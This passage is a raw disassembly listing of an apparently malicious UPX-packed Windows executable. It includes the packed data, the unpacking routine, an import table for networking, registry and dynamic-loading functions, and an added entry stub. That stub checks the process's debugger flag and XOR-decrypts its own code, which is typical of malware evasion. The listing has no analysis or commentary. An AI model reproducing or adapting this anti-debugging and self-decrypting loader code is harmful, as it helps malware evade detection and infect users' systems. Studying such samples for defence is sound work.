dd 60A3F40Ch, 1E400CA0h, 0CA04AF2h, 9DFF0CB1h, 0A000191Ch
dd 40880Ch, 3EC0009h, 7C93C23Dh, 14950007h, 707C4F40h
dd 6452F640h, 700BF83h, 0E13C1343h, 8578447Fh, 5BAB0013h
dd 1013E9A6h, 4E78CF8h, 0FEFF2FF2h, 1860230Eh, 0BE406A2Ch
dd 0E9F28408h, 4388E93Eh, 0FFEE10B9h, 3010B801h, 0C793C9Bh
dd 70DAD20h, 0F90AF2CFh, 18D80F7Fh, 0C8847001h, 0F92BC87h
dd 0F950F84h, 7E4F2600h, 847F0203h, 6F0F6C0Fh, 0C3C255h
dd 436FA89Ah, 6446049Fh, 6E691F13h, 536D5058h, 5020E560h
dd 44460072h
dd 4227E401h, 6B32399Eh, 7515123Ch, 4206BD02h, 53419Eh
dd 57FF941Ch, 0EB01910Eh, 5C5CC606h, 695C7325h, 0FFFCBA70h
dd 662463CDh, 71CEC81h, 5300E4FFh, 62654465h, 76696775h
dd 9A8C7D1Bh, 41A76785h, 61756A64h, 4CDB7254h, 656B6FF6h
dd 4C73176Eh, 7075126Fh, 4FEEDFB6h, 756C6156h, 4F174165h
dd 636F2870h, 752C7324h, 34C6A4h, 3F617643h, 0A951B233h
dd 4C79E318h, 168DFC6Dh, 11651E88h, 6172545Fh, 96DA5779h
dd 17354AEAh, 1A613143h, 0DDCEA952h, 56F6896h, 140C6854h
dd 0B5BA7356h, 58DB51ADh, 454F2841h, 0B6B3D278h, 6E3A7799h
dd 0F3F54735h, 344B891Eh, 545448FAh, 203C7F50h, 0A95A5732h
dd 4F207EF7h, 10A0D4Bh, 0B3449F4Bh, 2DDB56Fh, 67044C2Dh
dd 25203A2Dh, 3DAD1875h, 282F652Ch, 26B57954h, 6D5B5336h
dd 638670A3h, 0F72F1583h, 2AD4754h, 72932DC7h, 58C5A1C9h
dd 47579F2Bh, 0A3DD2B00h, 0F6F451ADh, 73CBE564h, 2BFDA165h
dd 76736D8Dh, 77CBA963h, 0A9C5BBEEh, 3203F169h, 0E775175Fh
dd 6CD34DBDh, 34353603h, 6EBB6933h, 7CE9A69h, 30313203h
dd 0C8322B39h, 38CEE7h, 343507E5h, 0C8320C8h, 26313233h
dd 30320EA4h, 3ADB7837h, 0A56B3FFEh, 53A3C1B4h, 5754464Fh
dd 5C455241h, 0B160694Dh, 6FE9556Dh, 0C3A75CBFh, 5CFDD6DDh
dd 72727543h, 73C456FDh, 75525CF2h, 0ED0C3ACh, 0E455C48Bh
dd 0F64D1B8Fh, 6E67BFB6h, 6A726473h, 0E2652379h, 12D85300h
dd 0E649CAF6h, 0AD6C0E57h, 2D60A15Ch, 0E357467Fh, 0CDC03770h
dd 20534449h, 20672E43h, 0B7B3F576h, 760BEB95h, 9D325048h
dd 0DB25EC63h, 105320DCh, 1A1B6544h, 96E66F87h, 12172385h
dd 0E3634683h, 407379C7h, 20334200h, 71AD318Fh, 1323B58Bh
dd 48206D1Bh, 0B0180506h, 44378242h, 0B773D9B0h, 66DE208Dh
dd 9C6D672Fh, 0FED6632Ah, 63242D85h, 7974690Ah, 6E614D20h
dd 404D1A1Eh, 0D22276h, 0E306DBC4h, 0EC408B74h, 0C65B446h
dd 0C65B6370h, 53470DF9h, 0E9B66F4Dh, 65871BA6h, 614E6B46h
dd 6C01686Dh, 35C177DFh, 956372E0h, 79705F0Ah, 0C96E4919h
dd 28D10AB9h, 0DA4E3265h, 81A5D346h, 70676C6Fh, 41D8538Ch
dd 8A8D856Ah, 9C192768h, 6B42BA99h, 0FD33212h, 0B0188F54h
dd 2C35AE60h, 1E4E2118h, 885B05B6h, 41616974h, 0B6764554h
dd 3F19F0B0h, 4632616Bh, 0E63C5363h, 67DBDAE8h, 6A624F7Bh
dd 1442C76h, 0C3317322h, 0B548DB0h, 0DEF6C83Ah, 48DB42C2h
dd 470C645Eh, 0DB61DE24h, 6E085E4Bh, 355A61D2h, 0F0E09C74h
dd 635244C7h, 0B63679C8h, 0E4149856h, 4E492B1Fh, 76C3866Fh
dd 9530FEBh, 49067065h, 0CD9326CCh, 641C5B82h, 6EB32845h
dd 6630592Eh, 12E0E836h, 7AD1AC47h, 0FD8DA0Bh, 0AF66C13Bh
dd 62694CF1h, 2BB5671Ah, 0B5CD5808h, 137C824Dh, 59B3DAD5h
dd 63CF8E40h, 74816954h, 8816D61Dh, 4DDE6575h, 0D9B278E9h
dd 0D23424ACh, 8B305D0Dh, 39C45ED0h, 9B09624Fh, 455A8795h
dd 0B8DF3178h, 0A6A56B1h, 522D906Ah, 0E785D91Bh, 87B5926h
dd 38657A86h, 0B03885B5h, 45154CA7h, 64DF67FCh, 0D16FC3A3h
dd 4BA1673Ah, 0E773808Bh, 10457965h, 970FC186h, 510ED6B0h
dd 9E11F60Ah, 0B0109B16h, 1021E730h, 61DEDDA1h, 410C51E0h
dd 34BE6E62h, 0E4040A15h, 0A6E6104h, 62205B3h, 36777463h
dd 3582FB6Ch, 440A1089h, 5A0E6112h, 8AD7F6C7h, 0CA796669h
dd 2B758F67h, 0C3686DECh, 6FCE6C36h, 11112C79h, 6F2DECEEh
dd 0FF8F5210h, 0EA071ECh, 4114B4D0h, 69757163h, 0B0E95C72h
dd 35494D21h, 0B34F86A0h, 0DE133AE0h, 0CA7273ECh, 6DA39C31h
dd 35B26D06h, 33B4920Eh, 530F62D7h, 445F1D4Dh, 2B70E066h
dd 685F3F58h, 8527F9F6h, 22E6236h, 0AE727907h, 9C53572Ch
dd 5946C4E9h, 69A0395Dh, 65271DC6h, 0C5984C0Eh, 0A141586h
dd 0DCB615E7h, 6649B420h, 62057090h, 0B1BB669Ch, 0F44F4166h
dd 6D850424h, 855A0E0Fh, 11419B55h, 0B01484B0h, 6E14670Eh
dd 6BDC1A98h, 43496E03h, 32507453h, 1A811996h, 50D6CB47h
dd 6A3C0D8Ch, 0D020273h, 2CB2CB2Ch, 346F3901h, 0CB2CB217h
dd 4090CB2h, 1D5B1013h, 3616CAA4h, 4C964550h, 378B0FF3h
dd 40D47E4Dh, 0F00E069h, 0B0010B01h, 26403A33h, 0B2306B8h
dd 588AD7D1h, 20B0725h, 96CDECB7h, 0C50074Ah, 0B037811Eh
dd 7103433h, 84069B06h, 2D042F2Ch, 85718B8Ch, 17C64EDh
dd 0E26A2E1Eh, 0AC1A9230h, 17269024h, 4DE3DB90h, 2EE0049Fh
dd 0E4FBE164h, 616EBF0Fh, 272A2B5Fh, 0C04C016h, 0CC00002Fh
dd 9C33612h, 0FF000000h, 0
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_30905000
lea edi, [esi-4000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_30906B32
; ---------------------------------------------------------------------------
align 8
loc_30906B28: ; CODE XREF: UPX1:loc_30906B39�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_30906B2E: ; CODE XREF: UPX1:30906BC6�j
; UPX1:30906BDD�j
add ebx, ebx
jnz short loc_30906B39
loc_30906B32: ; CODE XREF: UPX1:30906B20�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B39: ; CODE XREF: UPX1:30906B30�j
jb short loc_30906B28
mov eax, 1
loc_30906B40: ; CODE XREF: UPX1:30906B4F�j
; UPX1:30906B5A�j
add ebx, ebx
jnz short loc_30906B4B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B4B: ; CODE XREF: UPX1:30906B42�j
adc eax, eax
add ebx, ebx
jnb short loc_30906B40
jnz short loc_30906B5C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B40
loc_30906B5C: ; CODE XREF: UPX1:30906B51�j
xor ecx, ecx
sub eax, 3
jb short loc_30906B70
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_30906BE2
mov ebp, eax
loc_30906B70: ; CODE XREF: UPX1:30906B61�j
add ebx, ebx
jnz short loc_30906B7B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B7B: ; CODE XREF: UPX1:30906B72�j
adc ecx, ecx
add ebx, ebx
jnz short loc_30906B88
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B88: ; CODE XREF: UPX1:30906B7F�j
adc ecx, ecx
jnz short loc_30906BAC
inc ecx
loc_30906B8D: ; CODE XREF: UPX1:30906B9C�j
; UPX1:30906BA7�j
add ebx, ebx
jnz short loc_30906B98
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_30906B98: ; CODE XREF: UPX1:30906B8F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_30906B8D
jnz short loc_30906BA9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_30906B8D
loc_30906BA9: ; CODE XREF: UPX1:30906B9E�j
add ecx, 2
loc_30906BAC: ; CODE XREF: UPX1:30906B8A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_30906BCC
loc_30906BBD: ; CODE XREF: UPX1:30906BC4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_30906BBD
jmp loc_30906B2E
; ---------------------------------------------------------------------------
align 4
loc_30906BCC: ; CODE XREF: UPX1:30906BBB�j
; UPX1:30906BD9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_30906BCC
add edi, ecx
jmp loc_30906B2E
; ---------------------------------------------------------------------------
loc_30906BE2: ; CODE XREF: UPX1:30906B6C�j
pop esi
mov edi, esi
mov ecx, 8Ch
loc_30906BEA: ; CODE XREF: UPX1:30906BF1�j
; UPX1:30906BF6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_30906BEF: ; CODE XREF: UPX1:30906C14�j
cmp al, 1
ja short loc_30906BEA
cmp byte ptr [edi], 1
jnz short loc_30906BEA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_30906BEF
lea edi, [esi+4000h]
loc_30906C1C: ; CODE XREF: UPX1:30906C3E�j
mov eax, [edi]
or eax, eax
jz short loc_30906C67
mov ebx, [edi+4]
lea eax, [eax+esi+6000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+608Ch]
xchg eax, ebp
loc_30906C39: ; CODE XREF: UPX1:30906C5F�j
mov al, [edi]
inc edi
or al, al
jz short loc_30906C1C
mov ecx, edi
jns short near ptr loc_30906C4A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_30906C4A: ; CODE XREF: UPX1:30906C42�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+6090h]
or eax, eax
jz short loc_30906C61
mov [ebx], eax
add ebx, 4
jmp short loc_30906C39
; ---------------------------------------------------------------------------
loc_30906C61: ; CODE XREF: UPX1:30906C58�j
call dword ptr [esi+6094h]
loc_30906C67: ; CODE XREF: UPX1:30906C20�j
popa
jmp loc_30902305
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00007000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00007000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 30907000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 70C4h, 708Ch, 3 dup(0)
dd 70D1h, 709Ch, 3 dup(0)
dd 70DEh, 70A4h, 3 dup(0)
dd 70E9h, 70ACh, 3 dup(0)
dd 70F4h, 70B4h, 3 dup(0)
dd 7100h, 70BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
pop ebx
call loc_3090725F
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:3090720F�j
jmp short near ptr loc_3090720A+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3090725E
call $+5
pop ebp
sub ebp, 402320h
mov eax, [ebp+402367h]
add eax, [ebp+40236Fh]
mov esi, eax
mov eax, [ebp+40236Bh]
add eax, [ebp+40236Fh]
push eax
mov edi, esi
xor ecx, ecx
loc_3090724D: ; CODE XREF: UPX2:3090725C�j
lodsb
xor al, [ebp+402377h]
stosb
inc ecx
cmp ecx, [ebp+402373h]
jl short loc_3090724D
locret_3090725E: ; CODE XREF: UPX2:30907220�j
retn
; ---------------------------------------------------------------------------
loc_3090725F: ; CODE XREF: UPX2:30907201�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], dl
add [eax], dl
imul eax, [eax], 0
; ---------------------------------------------------------------------------
dw 0
db 90h
db 30h, 0, 1Eh
dd 380000h, 760h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 30909000h
align 2000h
_idata2 ends
end start